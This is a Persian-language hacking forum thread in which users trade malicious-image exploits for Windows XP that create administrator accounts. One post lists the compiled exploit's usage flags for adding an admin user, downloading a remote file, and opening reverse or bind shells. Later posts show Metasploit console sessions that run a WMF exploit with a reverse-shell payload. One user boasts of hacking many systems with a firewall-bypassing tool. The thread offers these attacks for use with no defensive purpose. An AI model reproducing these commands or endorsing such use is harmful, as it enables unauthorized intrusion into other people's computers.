اطلاعیه

Collapse
No announcement yet.

اکسپلویت ساخت یوزر ادمین با یک اجرای یک عکس

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • اکسپلویت ساخت یوزر ادمین با یک اجرای یک عکس

    این اکسپلویت چند وقتی هست اومده و واقعا هم کار می کنه
    می گند با یه عکس رد حتی guest هم اجراش کنی یوزر administaror می سازه در ویندوز xp ها

    تست هم کرده ان دوستان من هم پیداش کردم می خواهم یه عکس بسازم ولی نمی تونم این رو کامپایل کنم

    فایل .c اش را گذاشته ام یکی کامپایل کنه یا داره بده
    مرسی
    فایل های پیوست شده

  • #2
    کامپایل شده با یه عکس تولید شده.

    شل روی پورت 8888 میده.( البته قابل تغییره )
    اگه با پارامتر -a فایل ساخته بشه قابلیت اضافه کردن یوزر را هم میده
    تاریخش هم : September, 23, 2004
    نود32 هم عکسه را میگیره

    Flags Usage:
    * -a: Add User X with Pass X to Admin Group;
    * IE: Exploit.exe -a pic.jpg
    * -d: Download a File From an HTTP Server;
    * IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg
    * -r: Send Back a Shell To a Specified IP on a Specific Port;
    * IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)
    * -b: Bind a Shell on The Exploited Machine On a Specific Port;
    * IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)
    فایل های پیوست شده
    Last edited by joker; 01-15-2007, 10:25 PM.

    Comment


    • #3
      خيلي قديمي شده بيشتر ويندوز ها ديگه جواب نميدن وقتي تازه اومده بود خيلي باحاش حال كردم و قتت رو تلف نكن دنبال wmf.exe مهرداد بگرد هنوزم رو 50% سيستم ها جواب ميده
      خونه
      www.parspishro.ir
      ذهن آشفته ای من
      www.literature.blogfa.com

      Comment


      • #4
        خیلی ممنون از هر دوتون با چی کامپایل کردی؟ یا کامپایل شده داشتی؟
        اره اینتی ویروس میگیردش عکسه رو

        راستی این رو دارید تست کنم wmf.exe

        Comment


        • #5
          با ویژوال سی ،

          Comment


          • #6
            مرسی راستی این عکس رو ساختم انتی ویروس رو بستم که نگیره
            همون که یوزر می سازه ولی روی مال من کار نکرد یعنی یوزر نساخت ویندوزم 2005 هست فکر کنم روی قدیمی تر ها جواب میده

            راستی این یکی رو هم دارید بزارید ممنون :d ;)

            Comment


            • #7
              نوشته اصلی توسط joker
              کامپایل شده با یه عکس تولید شده.

              شل روی پورت 8888 میده.( البته قابل تغییره )
              اگه با پارامتر -a فایل ساخته بشه قابلیت اضافه کردن یوزر را هم میده
              تاریخش هم : September, 23, 2004
              نود32 هم عکسه را میگیره
              آنتی ویروس سیمانتک هم شناتش جوکر جون یک سوال داشتم یعنی اگه تو guist ویندوز xp اجراش
              کنیم دیگه چی میشه می یکم بیشتر توضیح بدین ؟ که چه کارها میشه باهاش کرد ؟! :confused:


              فرزند هنر باش نه فرزند پدر که هنر زنده کند نام پدر

              Comment


              • #8
                نوشته اصلی توسط magic_2006
                آنتی ویروس سیمانتک هم شناتش جوکر جون یک سوال داشتم یعنی اگه تو guist ویندوز xp اجراش
                کنیم دیگه چی میشه می یکم بیشتر توضیح بدین ؟ که چه کارها میشه باهاش کرد ؟! :confused:
                اگه با پارامتر -a فایل ساخته بشه قابلیت اضافه کردن یوزر را هم میده : joker
                بعد که وصل شدی با Net user میتونی یوزر ادمین بسازی (؟) ...

                Comment


                • #9
                  من از این متااسپلویت ie_xp_pfv_metafile استفاده کردم...اما نمیتونم از سیستم ویکتیم شل بگیرم...مشکل من کجاست.....تا این پیغام بیشتر جلو نمیرم....!!!!

                  msf ie_xp_pfv_metafile(win32_reverse) > exploit[*] Starting Reverse Handler.[*] Waiting for connections to http://192.168.2.124:8080/[*] HTTP Client connected from 192.168.2.124:2615, redirecting...[*] HTTP Client connected from 192.168.2.124:2616, sending 1584 bytes of payload
                  ...:confused: :confused: :confused:

                  Comment


                  • #10
                    عزیز در جای مربوط مطرح میکردی یا یه تاپیک باز ...
                    این که هنوز کانکت نشده ...داره میفرسته شاید سرعت پایین هست ...

                    Comment


                    • #11
                      ببخشید تو این تاپیک دادم....از همه معذرت میخوام:(
                      خیلی منتظر موندم اما connect نمیکنه!!!شاید من اشتباه عمل کردم .اشتباه داره؟

                      msf > use ie_xp_pfv_metafile
                      msf ie_xp_pfv_metafile > set TARGET 0
                      TARGET -> 0
                      msf ie_xp_pfv_metafile > set REALHOST 192.168.2.111
                      REALHOST -> 192.168.2.111
                      msf ie_xp_pfv_metafile > set LHOST 192.168.2.111
                      LHOST -> 192.168.2.111
                      msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
                      PAYLOAD -> win32_reverse
                      msf ie_xp_pfv_metafile(win32_reverse) > exploit[*] Starting Reverse Handler.[*] Waiting for connections to http://192.168.2.111:8080/[*] HTTP Client connected from 192.168.2.111:1316, redirecting...[*] HTTP Client connected from 192.168.2.111:1317, sending 1628 bytes of payload
                      ...

                      Comment


                      • #12
                        نوشته اصلی توسط takfanar
                        خيلي قديمي شده بيشتر ويندوز ها ديگه جواب نميدن وقتي تازه اومده بود خيلي باحاش حال كردم و قتت رو تلف نكن دنبال wmf.exe مهرداد بگرد هنوزم رو 50% سيستم ها جواب ميده
                        میشه درباره این wmf.exe مهرداد توضیح بدی ؟

                        حالا مال مهرداد چه فرقی با این پایینی دیگه داره ؟
                        مگه پایینی همین نیست ؟

                        کد:
                        C:\>wmf
                        Usage : wmf_expl.exe url [-t]
                            the 't' option will let you test for the shellcode first

                        Comment


                        • #13
                          مال مهرداد نميدونم از كي گرفتش كدش براي دانلود فايل فرق داره خودم هم حواسم نبود پاكش كردم ولي تغريبن همه اون جا هاي رو كه لازم داشتم حك كردم كسي داره بزارش سرعتش تو دانلود خيلي عالي بيشتر فاير وال ها رو هم باي پس ميكنه ! فقط آنتي هك ها ميگيرنش (تا اون زمون كه اين جوري بود حالا رو نميدونم)
                          خونه
                          www.parspishro.ir
                          ذهن آشفته ای من
                          www.literature.blogfa.com

                          Comment

                          Working...
                          X